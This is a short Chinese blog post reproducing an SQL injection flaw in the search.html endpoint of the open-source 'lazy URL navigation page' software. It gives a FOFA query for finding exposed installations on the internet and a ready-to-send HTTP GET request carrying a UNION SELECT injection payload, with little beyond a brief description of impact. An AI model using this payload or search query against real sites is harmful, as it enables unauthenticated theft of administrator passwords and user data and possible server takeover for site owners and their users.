Babing
Published on 2024-08-30 / 2 Visits
0
0

K12-1开源-懒人网址导航页-SQL

K12-1开源-懒人网址导航页-SQL

漏洞描述:

懒人网址导航页 search.html 接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。

fofa语法:

body=“./templates/antidote/css/style.css”

漏洞复现:

查询数据库版本
payload:

GET /search.html?keyword='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x2d2d2d2d2d,md5(1),0x2d2d2d2d2d),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: keep-alive

效果图:
效果图


Comment